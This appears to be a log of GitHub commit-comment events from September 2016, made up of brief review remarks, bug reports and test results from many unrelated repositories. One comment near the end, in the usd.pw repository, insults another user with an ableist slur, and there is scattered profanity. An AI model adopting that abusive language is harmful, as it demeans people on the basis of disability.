{"id":"4546444777","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18977975,"position":5,"line":170,"path":"src/core/Rakudo/Internals.pm","commit_id":"06ec5add4a229070e139b79bb538c5b0d75930d4","created_at":"2016-09-11T20:18:00Z","updated_at":"2016-09-11T20:18:00Z","body":"\"with for\", typo?"}},"created_at":"2016-09-11T20:18:00Z"}
{"id":"4546445013","type":"CommitCommentEvent","actor":{"login":"Messant"},"repo":{"name":"annelf/wildshoes_projet"},"payload":{"comment":{"id":18977976,"position":null,"line":null,"path":null,"commit_id":"07424f40989ef872cf92b1180a922ff3d2d0a17a","created_at":"2016-09-11T20:18:12Z","updated_at":"2016-09-11T20:18:12Z","body":"Hey Nono, can you check this out?"}},"created_at":"2016-09-11T20:18:12Z"}
{"id":"4546445909","type":"CommitCommentEvent","actor":{"login":"bwwagner"},"repo":{"name":"bwwagner/AndonNetGame"},"payload":{"comment":{"id":18977980,"position":null,"line":null,"path":null,"commit_id":"85218405fe93f307eb33d75af96c715ca7557a78","created_at":"2016-09-11T20:18:48Z","updated_at":"2016-09-11T20:18:48Z","body":"When you said you were making the cards you really meant you were making the cards.  By hand.\r\nLooks nice."}},"created_at":"2016-09-11T20:18:48Z"}
{"id":"4546447696","type":"CommitCommentEvent","actor":{"login":"socalspawn"},"repo":{"name":"CalcProgrammer1/KeyboardVisualizerVCUI_Release"},"payload":{"comment":{"id":18977982,"position":null,"line":null,"path":null,"commit_id":"6d926d0ad317db20ebe38ed73d8c53e410bd0aed","created_at":"2016-09-11T20:19:59Z","updated_at":"2016-09-11T20:19:59Z","body":"Hey Calc.. \r\n\r\nI have an odd bug when using [VLC](http://www.videolan.org/vlc/index.html) and KV together? KV works perfect as long as I don't exit VLC while playing movies or music. When I do I get a buzzing feedback sound from my speakers with the visuals across my Razer gear locking up. The feedback happens until I kill KV? Tested it with old and new versions of KV and a few versions of VLC. It does not happen with Windows Media player or iTunes btw.  =/"}},"created_at":"2016-09-11T20:19:59Z"}
{"id":"4546449005","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"gigabit101/OpenLootBags"},"payload":{"comment":{"id":18977985,"position":5,"line":19,"path":"build.gradle","commit_id":"3af1688017aadc2f30c66a59a33438611954fd76","created_at":"2016-09-11T20:20:44Z","updated_at":"2016-09-11T20:20:44Z","body":"Forge doesn't like versions like this, it's not a major issue though."}},"created_at":"2016-09-11T20:20:44Z"}
{"id":"4546450309","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"gigabit101/OpenLootBags"},"payload":{"comment":{"id":18977988,"position":28,"line":30,"path":"src/main/java/gigabit101/openlootbags/OpenLootBags.java","commit_id":"3af1688017aadc2f30c66a59a33438611954fd76","created_at":"2016-09-11T20:21:30Z","updated_at":"2016-09-11T20:21:30Z","body":"We can get gradle to set this."}},"created_at":"2016-09-11T20:21:30Z"}
{"id":"4546451069","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18977991,"position":null,"line":null,"path":null,"commit_id":"c84e74526e533f3ee14b8d6f90a82c3bb23ef400","created_at":"2016-09-11T20:21:59Z","updated_at":"2016-09-11T20:21:59Z","body":"@ngoquang2708 https://android.googlesource.com/platform/packages/apps/Music/%2B/6036ce6127022880a3d9c99bd15db4c968f3e6a3\r\nThe other nougat phone has no problem with screen off dude. did you check dude if its memory leak? The Link is for music app in order to not crash. :)"}},"created_at":"2016-09-11T20:21:59Z"}
{"id":"4546451879","type":"CommitCommentEvent","actor":{"login":"NicMcPhee"},"repo":{"name":"dstelljes/container-project"},"payload":{"comment":{"id":18977993,"position":null,"line":null,"path":null,"commit_id":"a46259e97b56b17c32981235d92aa549d215eb8c","created_at":"2016-09-11T20:22:30Z","updated_at":"2016-09-11T20:22:30Z","body":"A good change. I obviously know who you are, but since you're doing this in public, going to full names is a good idea."}},"created_at":"2016-09-11T20:22:30Z"}
{"id":"4546452789","type":"CommitCommentEvent","actor":{"login":"gigabit101"},"repo":{"name":"gigabit101/OpenLootBags"},"payload":{"comment":{"id":18977995,"position":28,"line":30,"path":"src/main/java/gigabit101/openlootbags/OpenLootBags.java","commit_id":"3af1688017aadc2f30c66a59a33438611954fd76","created_at":"2016-09-11T20:23:08Z","updated_at":"2016-09-11T20:23:08Z","body":"it will not be like this for long and its a String so why dose it have issues with it also build worked so..."}},"created_at":"2016-09-11T20:23:08Z"}
{"id":"4546453655","type":"CommitCommentEvent","actor":{"login":"nixololo"},"repo":{"name":"CeQadrat/ColdFilmSerialProvider"},"payload":{"comment":{"id":18977996,"position":13,"line":10,"path":"app.js","commit_id":"e51342a2f839b3ba5726cfdd09f4a0a76882616f","created_at":"2016-09-11T20:23:40Z","updated_at":"2016-09-11T20:23:40Z","body":"use es6 features: you can write just `key: key` if you fave `key` variable\r\nbut don't mix it with old style\r\n`\r\nkey1: value1,\r\nkey2,\r\nkey3: value3\r\n`\r\nit's bad :-1: \r\n\r\n`\r\nkey1: value1,\r\nkey3: value3,\r\nkey2\r\n`\r\nit's looks better :+1: "}},"created_at":"2016-09-11T20:23:40Z"}
{"id":"4546454952","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18977997,"position":null,"line":null,"path":null,"commit_id":"78295dc30bc95310bf7d92af325f082abafd03ba","created_at":"2016-09-11T20:24:31Z","updated_at":"2016-09-11T20:24:31Z","body":"@atamariya Thanks for your explanation, it's make sens ;-)\r\n\r\nWithout any offense, IMO it's already look to me as a too big PR to be merged ?"}},"created_at":"2016-09-11T20:24:31Z"}
{"id":"4546455429","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"gigabit101/OpenLootBags"},"payload":{"comment":{"id":18977998,"position":28,"line":30,"path":"src/main/java/gigabit101/openlootbags/OpenLootBags.java","commit_id":"3af1688017aadc2f30c66a59a33438611954fd76","created_at":"2016-09-11T20:24:50Z","updated_at":"2016-09-11T20:24:50Z","body":"Forge will be enforcing semVer at some point. It will work for now."}},"created_at":"2016-09-11T20:24:50Z"}
{"id":"4546455665","type":"CommitCommentEvent","actor":{"login":"IvanTheCracka"},"repo":{"name":"HippieStationCode/HippieStation13"},"payload":{"comment":{"id":18977999,"position":null,"line":null,"path":null,"commit_id":"07284e1870381a747a3ab629abfa97aa1e87ca83","created_at":"2016-09-11T20:24:58Z","updated_at":"2016-09-11T20:24:58Z","body":">fists now deal less stamina damage and more brute damage\r\n\r\nWHAT WAS THE FUCKING STAMINA UPDATE FOR REEEEEEEEEEEEEEE"}},"created_at":"2016-09-11T20:24:58Z"}
{"id":"4546457645","type":"CommitCommentEvent","actor":{"login":"hongaar"},"repo":{"name":"froog/unveil2"},"payload":{"comment":{"id":18978000,"position":null,"line":null,"path":null,"commit_id":"5751ad8866831d89cb8206b27c87d8eda6f43bf1","created_at":"2016-09-11T20:26:14Z","updated_at":"2016-09-11T20:26:14Z","body":"Awesome, could you do a pull request on nabble/unveil2?"}},"created_at":"2016-09-11T20:26:14Z"}
{"id":"4546459094","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18978001,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T20:27:12Z","updated_at":"2016-09-11T20:27:12Z","body":"Mentioning the minimum required version to use mbedtls doesn't sound really useful, as the build process takes care of downloading the latest version anyway. People looking at minimum dependencies are more likely to use the system version. Maybe we could only mention the minimum version in the description, explaining that it's needed only for mbedtls support?"}},"created_at":"2016-09-11T20:27:12Z"}
{"id":"4546461774","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"kelunik/loop-block"},"payload":{"comment":{"id":18978006,"position":34,"line":34,"path":"src/BlockDetector.php","commit_id":"e8a5735de23ba3ae66dcc20559bd2ddfb51922bf","created_at":"2016-09-11T20:28:59Z","updated_at":"2016-09-11T20:28:59Z","body":"Should probably do an `if ($this->watcher !== null)` check before the callback call in order to avoid callbacks after stop()'ping. [i.e. in case stop() is called after `repeat()`, but before the `defer()`.]"}},"created_at":"2016-09-11T20:28:59Z"}
{"id":"4546462263","type":"CommitCommentEvent","actor":{"login":"alexsedova"},"repo":{"name":"Praqma/tracey-cli-rabbitmq"},"payload":{"comment":{"id":18978010,"position":60,"line":75,"path":"src/main/java/net/praqma/tracey/cli/Tracey.java","commit_id":"dbbeb2f91743912cbf6ed31b1cd4637d5815c569","created_at":"2016-09-11T20:29:17Z","updated_at":"2016-09-11T20:29:17Z","body":"Add getOrDefault instead of get(). We want to keep default values if now values at the fields."}},"created_at":"2016-09-11T20:29:17Z"}
{"id":"4546465276","type":"CommitCommentEvent","actor":{"login":"KajkoIKokosz"},"repo":{"name":"KajkoIKokosz/nauka_git"},"payload":{"comment":{"id":18978017,"position":7,"line":7,"path":"drugi_plik.txt","commit_id":"087301f50a67f15f6d540e7a0e064f2591362458","created_at":"2016-09-11T20:31:03Z","updated_at":"2016-09-11T20:31:03Z","body":"ok, zostawiamy to?"}},"created_at":"2016-09-11T20:31:03Z"}
{"id":"4546465908","type":"CommitCommentEvent","actor":{"login":"KajkoIKokosz"},"repo":{"name":"KajkoIKokosz/nauka_git"},"payload":{"comment":{"id":18978018,"position":2,"line":2,"path":"drugi_plik.txt","commit_id":"087301f50a67f15f6d540e7a0e064f2591362458","created_at":"2016-09-11T20:31:27Z","updated_at":"2016-09-11T20:31:27Z","body":"whitespace? wypiedalamy?"}},"created_at":"2016-09-11T20:31:27Z"}
{"id":"4546466026","type":"CommitCommentEvent","actor":{"login":"ekkimosi"},"repo":{"name":"deltaxflux/fluxion"},"payload":{"comment":{"id":18978019,"position":null,"line":null,"path":null,"commit_id":"52619f5f97fc6d7aab979462d3f5efcafb21822e","created_at":"2016-09-11T20:31:33Z","updated_at":"2016-09-11T20:31:33Z","body":"\nThank you. I wrote to deltaxflux too on Hack Forum and he agree also. \nKeep in touch. \n\n\n\nInviato da Libero Mail per iOS\n\n\ndomenica 11 settembre 2016, 22:28 +0200 da notifications@github.com  <notifications@github.com>:\n>Feel free to submit one and we'll add it. \n>—\n>You are receiving this because you commented.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n"}},"created_at":"2016-09-11T20:31:33Z"}
{"id":"4546468398","type":"CommitCommentEvent","actor":{"login":"c-schmitz"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18978026,"position":null,"line":null,"path":null,"commit_id":"a62f1040288efa233577acc0d2514d9e2d57aa7e","created_at":"2016-09-11T20:33:06Z","updated_at":"2016-09-11T20:33:06Z","body":" :+1:   :+1:  :+1:"}},"created_at":"2016-09-11T20:33:06Z"}
{"id":"4546468640","type":"CommitCommentEvent","actor":{"login":"tomaszchabinka"},"repo":{"name":"AggieCelina/DogsOrCats"},"payload":{"comment":{"id":18978027,"position":37,"line":45,"path":"app/src/main/java/girlscodefun/com/carordog/MainActivity.java","commit_id":"a4749506895a7553bc7750ee900e33a1b29a3f9d","created_at":"2016-09-11T20:33:15Z","updated_at":"2016-09-11T20:33:15Z","body":"chyba niepotrzebnie ustawiasz drugi parametr w ten sposób, ale oprócz tego super"}},"created_at":"2016-09-11T20:33:15Z"}
{"id":"4546469876","type":"CommitCommentEvent","actor":{"login":"EHadoux"},"repo":{"name":"guillaume-bosc/BalanceSpan"},"payload":{"comment":{"id":18978029,"position":272,"line":272,"path":"algo/BalanceSpan_Linux/ProjDB.cpp","commit_id":"1d2826b71baf74e8996a79ca72276ab3b44d531c","created_at":"2016-09-11T20:34:03Z","updated_at":"2016-09-11T20:34:03Z","body":"I think there is a problem here. You are putting an `int` into an `int*` so the address is this `int`. \r\nShouldn't it be `dataset = &blabla`?\r\nThere is a segfault in 64bit on line 276 because an int is 32bit and a pointer is 64. It is transparent in 32bit (but right anyway)."}},"created_at":"2016-09-11T20:34:03Z"}
{"id":"4546470734","type":"CommitCommentEvent","actor":{"login":"KajkoIKokosz"},"repo":{"name":"KajkoIKokosz/nauka_git"},"payload":{"comment":{"id":18978032,"position":null,"line":null,"path":null,"commit_id":"087301f50a67f15f6d540e7a0e064f2591362458","created_at":"2016-09-11T20:34:38Z","updated_at":"2016-09-11T20:34:38Z","body":"ok, próbuje komitować z poziomu GIThuba"}},"created_at":"2016-09-11T20:34:38Z"}
{"id":"4546473310","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"WowDevTools/Neo"},"payload":{"comment":{"id":18978039,"position":null,"line":null,"path":null,"commit_id":"3f0d62e4e2eeb7d5e8c103fd8fe155bd98a39ffe","created_at":"2016-09-11T20:36:16Z","updated_at":"2016-09-11T20:36:16Z","body":"so i can generate a list with the dbc and then modify the dbc no?\r\ni have a simple question if you go in discord or please tell to @majorcyto or @skarnproject to get my skype"}},"created_at":"2016-09-11T20:36:16Z"}
{"id":"4546473835","type":"CommitCommentEvent","actor":{"login":"jmbarlow"},"repo":{"name":"analog-nico/foundation-emails-template"},"payload":{"comment":{"id":18978040,"position":null,"line":null,"path":null,"commit_id":"14d0ec6a159ef3c83e163868fce1d12c6bc30d37","created_at":"2016-09-11T20:36:38Z","updated_at":"2016-09-11T20:36:38Z","body":"This is really handy. :+1: for incorporating this into the standard gulp file."}},"created_at":"2016-09-11T20:36:38Z"}
{"id":"4546475792","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":18978045,"position":null,"line":null,"path":null,"commit_id":"607734fb7a1b378112877188864fbd730fae2b53","created_at":"2016-09-11T20:37:54Z","updated_at":"2016-09-11T20:37:54Z","body":":package: "}},"created_at":"2016-09-11T20:37:54Z"}
{"id":"4546475894","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"kelunik/loop-block"},"payload":{"comment":{"id":18978046,"position":34,"line":34,"path":"src/BlockDetector.php","commit_id":"e8a5735de23ba3ae66dcc20559bd2ddfb51922bf","created_at":"2016-09-11T20:37:59Z","updated_at":"2016-09-11T20:37:59Z","body":"Might be a good idea, but doesn't really matter. I don't expect it to be stopped that much."}},"created_at":"2016-09-11T20:37:59Z"}
{"id":"4546476572","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978047,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T20:38:25Z","updated_at":"2016-09-11T20:38:25Z","body":"To be more precise Alex, what DEFINITION of `flirt` are you referring to?"}},"created_at":"2016-09-11T20:38:25Z"}
{"id":"4546477299","type":"CommitCommentEvent","actor":{"login":"BugLight"},"repo":{"name":"Kistriver/mail2vk"},"payload":{"comment":{"id":18978048,"position":2,"line":2,"path":"test.sh","commit_id":"8435396bd9f367544758c0b8aba9e42251d0f4a7","created_at":"2016-09-11T20:38:54Z","updated_at":"2016-09-11T20:38:54Z","body":"Сторонний инструмент?"}},"created_at":"2016-09-11T20:38:54Z"}
{"id":"4546477573","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18978050,"position":87,"line":113,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T20:39:05Z","updated_at":"2016-09-11T20:39:05Z","body":"Да, у меня тут был return false, но мне не понравилось глазами смотреть, где у меня тест прошел, а где нет. Поэтому я решил поступить более жестко. Верну false"}},"created_at":"2016-09-11T20:39:05Z"}
{"id":"4546477914","type":"CommitCommentEvent","actor":{"login":"barncastle"},"repo":{"name":"WowDevTools/Neo"},"payload":{"comment":{"id":18978052,"position":null,"line":null,"path":null,"commit_id":"3f0d62e4e2eeb7d5e8c103fd8fe155bd98a39ffe","created_at":"2016-09-11T20:39:20Z","updated_at":"2016-09-11T20:39:20Z","body":"Have reverted this as I believe the internal classes are to be used instead of an external library"}},"created_at":"2016-09-11T20:39:20Z"}
{"id":"4546481493","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18978058,"position":null,"line":null,"path":null,"commit_id":"dba09ef68b315d33e84ead94780a0c60f4aaa3f8","created_at":"2016-09-11T20:41:30Z","updated_at":"2016-09-11T20:41:30Z","body":"@atamariya Is it for a similar reason that it's limited to _.srt_ subtitles ?"}},"created_at":"2016-09-11T20:41:30Z"}
{"id":"4546482367","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18978061,"position":112,"line":128,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T20:42:03Z","updated_at":"2016-09-11T20:42:03Z","body":"Все есть, но в конце. У меня возникли сложности с auto и nullptr, поэтому я сделал отдельный тест, хотя и не самый красивый"}},"created_at":"2016-09-11T20:42:03Z"}
{"id":"4546482379","type":"CommitCommentEvent","actor":{"login":"waejay"},"repo":{"name":"waejay/portfolio"},"payload":{"comment":{"id":18978062,"position":6,"line":8,"path":"app/assets/stylesheets/custom.scss","commit_id":"6da8b285f8a813aa080fe169abeeca9eeb09a685","created_at":"2016-09-11T20:42:03Z","updated_at":"2016-09-11T20:42:03Z","body":"init $white for main body fonts"}},"created_at":"2016-09-11T20:42:03Z"}
{"id":"4546482696","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18978063,"position":95,"line":162,"path":"tests/protractor/e2e/send-message.js","commit_id":"4c263585808e8bde97e5264ecacd6de2bd6677e9","created_at":"2016-09-11T20:42:16Z","updated_at":"2016-09-11T20:42:16Z","body":"Depending on translated text feels flakey - is there a class or other attribute on \"everyone at\" entries that you can use instead?"}},"created_at":"2016-09-11T20:42:16Z"}
{"id":"4546483475","type":"CommitCommentEvent","actor":{"login":"waejay"},"repo":{"name":"waejay/portfolio"},"payload":{"comment":{"id":18978064,"position":5,"line":7,"path":"app/assets/stylesheets/custom.scss","commit_id":"6da8b285f8a813aa080fe169abeeca9eeb09a685","created_at":"2016-09-11T20:42:48Z","updated_at":"2016-09-11T20:42:48Z","body":"for titles"}},"created_at":"2016-09-11T20:42:48Z"}
{"id":"4546486554","type":"CommitCommentEvent","actor":{"login":"Leinnan"},"repo":{"name":"degenerated1123/REGoth"},"payload":{"comment":{"id":18978067,"position":null,"line":null,"path":null,"commit_id":"8d004a43023232c88ccbc6323770aa47cc0f20b9","created_at":"2016-09-11T20:44:48Z","updated_at":"2016-09-11T20:44:48Z","body":"For what do you use SFML?"}},"created_at":"2016-09-11T20:44:48Z"}
{"id":"4546490942","type":"CommitCommentEvent","actor":{"login":"degenerated1123"},"repo":{"name":"degenerated1123/REGoth"},"payload":{"comment":{"id":18978076,"position":null,"line":null,"path":null,"commit_id":"8d004a43023232c88ccbc6323770aa47cc0f20b9","created_at":"2016-09-11T20:47:36Z","updated_at":"2016-09-11T20:47:36Z","body":"Audio-stuff for now. But I'll switch to something lighter some time."}},"created_at":"2016-09-11T20:47:36Z"}
{"id":"4546490963","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18978077,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-11T20:47:38Z","updated_at":"2016-09-11T20:47:38Z","body":"Local 10+0.1 test:\r\n\r\nScore of dev vs base: 616 - 534 - 1722  [0.514] 2872\r\nELO difference: 10\r\nSPRT: llr 2.21, lbound -2.2, ubound 2.2 - H1 was accepted"}},"created_at":"2016-09-11T20:47:38Z"}
{"id":"4546490999","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18978078,"position":20,"line":46,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T20:47:39Z","updated_at":"2016-09-11T20:47:39Z","body":"Да, я смотрел такой вариант, но он требовал отказываться от шаблона и auto или создавать какую-то безумную конструкцию на decltype. Возможно это мой необоснованный фетиш, но мне нравится здесь использовать шаблон и он мне кажется здесь полезным."}},"created_at":"2016-09-11T20:47:39Z"}
{"id":"4546491690","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18978080,"position":35,"line":16,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T20:48:06Z","updated_at":"2016-09-11T20:48:06Z","body":"Все есть, но в конце.)))"}},"created_at":"2016-09-11T20:48:06Z"}
{"id":"4546493252","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18978085,"position":49,"line":274,"path":"src/generators/genlua.ml","commit_id":"b7e204924c76cd1240840092e132eadc29d34bcf","created_at":"2016-09-11T20:49:07Z","updated_at":"2016-09-11T20:49:07Z","body":"yep!"}},"created_at":"2016-09-11T20:49:07Z"}
{"id":"4546494229","type":"CommitCommentEvent","actor":{"login":"ddvua"},"repo":{"name":"ddvua/PreAlphaVideoPlayerDS_first_test_Java_Project"},"payload":{"comment":{"id":18978087,"position":null,"line":null,"path":null,"commit_id":"efa6f7e7a9838ed6d0e7f57c0ac3302996abc4c7","created_at":"2016-09-11T20:49:42Z","updated_at":"2016-09-11T20:49:42Z","body":"Sorry, no \r\n\r\n> **I view**\r\n\r\n, of course, I meant \r\n\r\n> **I see**"}},"created_at":"2016-09-11T20:49:42Z"}
{"id":"4546494904","type":"CommitCommentEvent","actor":{"login":"8498"},"repo":{"name":"8498/eSportSystem"},"payload":{"comment":{"id":18978090,"position":null,"line":null,"path":null,"commit_id":"815a3c159aa00d18fef4652cab33fffdf7eb61ba","created_at":"2016-09-11T20:50:11Z","updated_at":"2016-09-11T20:50:11Z","body":"Delete bin/ files"}},"created_at":"2016-09-11T20:50:11Z"}
{"id":"4546495135","type":"CommitCommentEvent","actor":{"login":"elementrem"},"repo":{"name":"elementrem/go-elementrem"},"payload":{"comment":{"id":18978091,"position":null,"line":null,"path":null,"commit_id":"2392189f0b7cffd403bd2be05f1cc67aaf4b000e","created_at":"2016-09-11T20:50:17Z","updated_at":"2016-09-11T20:50:17Z","body":"Conflicts:\r\n\tele/handler.go\r\n\tele/sync.go"}},"created_at":"2016-09-11T20:50:17Z"}
{"id":"4546495930","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18978092,"position":85,"line":111,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T20:50:43Z","updated_at":"2016-09-11T20:50:43Z","body":"Да, точно. Пропустил мимо. (("}},"created_at":"2016-09-11T20:50:43Z"}
{"id":"4546500090","type":"CommitCommentEvent","actor":{"login":"sameerppatil"},"repo":{"name":"sameerppatil/assignment1"},"payload":{"comment":{"id":18978100,"position":null,"line":null,"path":null,"commit_id":"c1a302e9823752df9abc216149ded6660a768628","created_at":"2016-09-11T20:53:21Z","updated_at":"2016-09-11T20:53:21Z","body":"Akshay, does this compile? \r\nI checked out this code and tried to compile this but it doesn't work.\r\nAnything I am missing out on?"}},"created_at":"2016-09-11T20:53:21Z"}
{"id":"4546502228","type":"CommitCommentEvent","actor":{"login":"dimatter"},"repo":{"name":"leefuller23/EquationGroupLeak"},"payload":{"comment":{"id":18978106,"position":null,"line":null,"path":null,"commit_id":"2ead73b08691692645c161378c3c43e1927243f6","created_at":"2016-09-11T20:54:41Z","updated_at":"2016-09-11T20:54:41Z","body":"dafaq am I looking at?"}},"created_at":"2016-09-11T20:54:41Z"}
{"id":"4546502366","type":"CommitCommentEvent","actor":{"login":"rob006"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18978107,"position":null,"line":null,"path":null,"commit_id":"c66b845f4809125d3e320ce138eed3b1ecb7b39d","created_at":"2016-09-11T20:54:45Z","updated_at":"2016-09-11T20:54:45Z","body":"Changelog entry should be also reverted."}},"created_at":"2016-09-11T20:54:45Z"}
{"id":"4546502767","type":"CommitCommentEvent","actor":{"login":"sameerppatil"},"repo":{"name":"sameerppatil/assignment1"},"payload":{"comment":{"id":18978108,"position":null,"line":null,"path":null,"commit_id":"c1a302e9823752df9abc216149ded6660a768628","created_at":"2016-09-11T20:55:03Z","updated_at":"2016-09-11T20:55:03Z","body":"Don't know what went wrong earlier, made a clean compile and it works just fine."}},"created_at":"2016-09-11T20:55:03Z"}
{"id":"4546503361","type":"CommitCommentEvent","actor":{"login":"Kierany9"},"repo":{"name":"HippieStationCode/HippieStation13"},"payload":{"comment":{"id":18978109,"position":null,"line":null,"path":null,"commit_id":"07284e1870381a747a3ab629abfa97aa1e87ca83","created_at":"2016-09-11T20:55:26Z","updated_at":"2016-09-11T20:55:26Z","body":"The product of an ill-conceived plan, a series of simple... misunderstandings, met with an... overzealous response. We believe the best course of action now is to collaborate with the coderbus for the... betterment of all spessmen. We are of one mind about this. The path ahead is clear."}},"created_at":"2016-09-11T20:55:26Z"}
{"id":"4546504480","type":"CommitCommentEvent","actor":{"login":"pringers"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":18978111,"position":null,"line":null,"path":null,"commit_id":"7f73ff2d9569b8cd1d5bb1103ec0a31ae0e95fc3","created_at":"2016-09-11T20:56:13Z","updated_at":"2016-09-11T20:56:13Z","body":"it's still offensive."}},"created_at":"2016-09-11T20:56:13Z"}
{"id":"4546505184","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/website"},"payload":{"comment":{"id":18978112,"position":6,"line":17,"path":"_env/nginx.conf","commit_id":"e68643611f47425b424d0d766bb4bfb00396debf","created_at":"2016-09-11T20:56:42Z","updated_at":"2016-09-11T20:56:42Z","body":"should we also support other compression types? (or does this do that for us?)"}},"created_at":"2016-09-11T20:56:42Z"}
{"id":"4546505854","type":"CommitCommentEvent","actor":{"login":"mislav"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":18978113,"position":79,"line":79,"path":"vendor/github.com/howeyc/gopass/pass.go","commit_id":"70d7bb66d54c922ef7bdfe59bb26283b7cb8a365","created_at":"2016-09-11T20:57:10Z","updated_at":"2016-09-11T20:57:10Z","body":"That's a good catch. You should report that to howeyc/gopass!"}},"created_at":"2016-09-11T20:57:10Z"}
{"id":"4546507259","type":"CommitCommentEvent","actor":{"login":"Daniil1288"},"repo":{"name":"RocketMod/Rocket"},"payload":{"comment":{"id":18978118,"position":null,"line":null,"path":null,"commit_id":"069fc895b8874e9024c9f67d2a54bd121f123fde","created_at":"2016-09-11T20:58:08Z","updated_at":"2016-09-11T20:58:08Z","body":"@fr34kyn01535, did you want to mention @leonardosnt ?"}},"created_at":"2016-09-11T20:58:08Z"}
{"id":"4546507620","type":"CommitCommentEvent","actor":{"login":"JPeroutek"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":18978119,"position":null,"line":null,"path":null,"commit_id":"e3ed69dfaa501b64c78abcfc108df4b4339505ed","created_at":"2016-09-11T20:58:19Z","updated_at":"2016-09-11T20:58:19Z","body":"dumb commit.  "}},"created_at":"2016-09-11T20:58:19Z"}
{"id":"4546509082","type":"CommitCommentEvent","actor":{"login":"cgruis"},"repo":{"name":"cgruis/IDD_HW_2_gruis"},"payload":{"comment":{"id":18978126,"position":null,"line":null,"path":null,"commit_id":"b5aaed2f247a9274df20696dc324dd7fb8cc7c94","created_at":"2016-09-11T20:59:14Z","updated_at":"2016-09-11T20:59:14Z","body":"This file also submitted on bCourses"}},"created_at":"2016-09-11T20:59:14Z"}
{"id":"4546509143","type":"CommitCommentEvent","actor":{"login":"JPeroutek"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":18978127,"position":null,"line":null,"path":null,"commit_id":"475c173b5c4d24ffaed49b29317f6ae9416c9c79","created_at":"2016-09-11T20:59:16Z","updated_at":"2016-09-11T20:59:16Z","body":"Thats not a username you autist."}},"created_at":"2016-09-11T20:59:16Z"}
{"id":"4546510659","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/website"},"payload":{"comment":{"id":18978128,"position":4,"line":18,"path":"_env/nginx.conf","commit_id":"6589a6145235fabf055e802416dcc77faab762f7","created_at":"2016-09-11T21:00:14Z","updated_at":"2016-09-11T21:00:14Z","body":"This results in duplicate values when the page is being served from saffron, which Firefox complains about (though the pages still work)."}},"created_at":"2016-09-11T21:00:14Z"}
{"id":"4546510952","type":"CommitCommentEvent","actor":{"login":"ToadKing"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18978129,"position":null,"line":null,"path":null,"commit_id":"64ee605076b4f63e3a3a65316323cc61f210f030","created_at":"2016-09-11T21:00:21Z","updated_at":"2016-09-11T21:00:21Z","body":"@twinaphex Tested this fix out and it works on my local builds. Ping me again if it still has issues."}},"created_at":"2016-09-11T21:00:21Z"}
